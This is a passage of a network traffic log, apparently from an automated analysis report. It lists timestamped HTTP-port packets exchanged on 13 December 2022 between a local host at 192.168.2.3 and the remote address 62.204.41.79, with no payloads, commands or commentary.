                                              Dec 13, 2022 20:09:16.664072990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664211035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664340973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664473057 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664567947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664658070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664762974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.664890051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665025949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665162086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665294886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665427923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665563107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665693998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665823936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.665955067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666084051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666213989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666341066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666471958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666604042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666743040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.666871071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.667006016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.667129993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.667277098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.667367935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.667414904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.667439938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.667529106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.667598009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.667670012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.667781115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.667936087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668059111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668133020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668292999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668648005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668675900 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668689013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668703079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.668874025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669199944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669224977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669364929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669430971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669450998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669572115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669651985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.669964075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.670135975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.670274019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.670555115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.670649052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.670778036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.670948029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.671087027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.671210051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.671436071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.671458960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.671654940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.671871901 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672015905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672111988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672229052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672382116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672662973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672683954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.672797918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.673270941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.673337936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.673480034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.673655033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.673856974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.673882961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.679366112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.679404020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.679457903 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684452057 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684487104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684505939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684556961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684690952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684767962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.684849977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.685239077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.685657978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.685682058 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.685826063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.685935020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686052084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686072111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686311007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686336040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686464071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686485052 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686583042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686657906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.686742067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.687134981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.688448906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.688492060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.688512087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.688530922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.688637972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.689873934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.689912081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.689929962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.689970970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690048933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690089941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690171957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690210104 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690341949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690398932 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690670013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690702915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690723896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690741062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.690762043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.697173119 CET4974380192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.698596001 CET4974480192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.698946953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699223042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699321032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699409008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699496031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699584007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699673891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699759007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699852943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.699943066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.700059891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.700165987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.700351954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.716833115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.716999054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717128992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717247009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717367887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717597961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717771053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717863083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.717950106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718034983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718123913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718208075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718298912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718420982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718606949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718777895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.718893051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719001055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719089031 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719172001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719259024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719388008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719557047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719679117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.719826937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.722366095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722404957 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722434998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722441912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722450018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722541094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722718954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.722934008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723124981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723185062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723258018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723278999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723298073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723315954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723431110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723453045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723670959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.723879099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724140882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724216938 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724271059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724291086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724430084 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724548101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724673033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724715948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.724864006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725087881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725107908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725189924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725342035 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725362062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725506067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725632906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725708961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.725878954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726154089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726185083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726300001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726562023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726586103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726665974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726744890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.726946115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727088928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727312088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727332115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727444887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727550983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727736950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.727869034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.728064060 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.758518934 CET804974462.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.758749008 CET804974362.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.758856058 CET4974480192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.758898020 CET4974380192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.759696960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.759984016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760004044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760021925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760137081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760157108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760199070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760319948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760447979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760699987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760718107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.760842085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.777606964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.777652979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.777812004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.777831078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778088093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778239965 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778311968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778356075 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778575897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778599977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778669119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.778759956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779062033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779125929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779369116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779445887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779692888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779726982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779746056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.779889107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.780342102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.780616999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.780636072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.791682005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.791826010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.792042017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.792042017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.792197943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.792406082 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.792784929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793128014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793275118 CET4974480192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793453932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793626070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793693066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793781996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.793899059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794011116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794126987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794254065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794374943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794480085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794686079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.794847012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795000076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795125961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795430899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795557022 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795676947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795802116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.795934916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.796300888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.796425104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.796544075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.796629906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.796761990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.796885014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797023058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797153950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797295094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797439098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797565937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797715902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797852039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.797982931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798088074 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798187971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798275948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798373938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798477888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798587084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.798674107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802305937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802504063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802515984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802608013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802711010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802835941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.802959919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803045034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803153992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803245068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803375006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803472996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803603888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803694963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803787947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.803874016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804255962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804359913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804444075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804547071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804641008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804733992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804831982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.804927111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805022001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805115938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805223942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805321932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805412054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805500984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805593014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805687904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805779934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805866003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.805955887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806051970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806137085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806258917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806389093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806530952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806654930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806785107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.806943893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807041883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807130098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807219028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807310104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807398081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807488918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807593107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807665110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.807754040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.809804916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.809976101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814044952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814197063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.814289093 CET4973680192.168.2.362.204.41.79
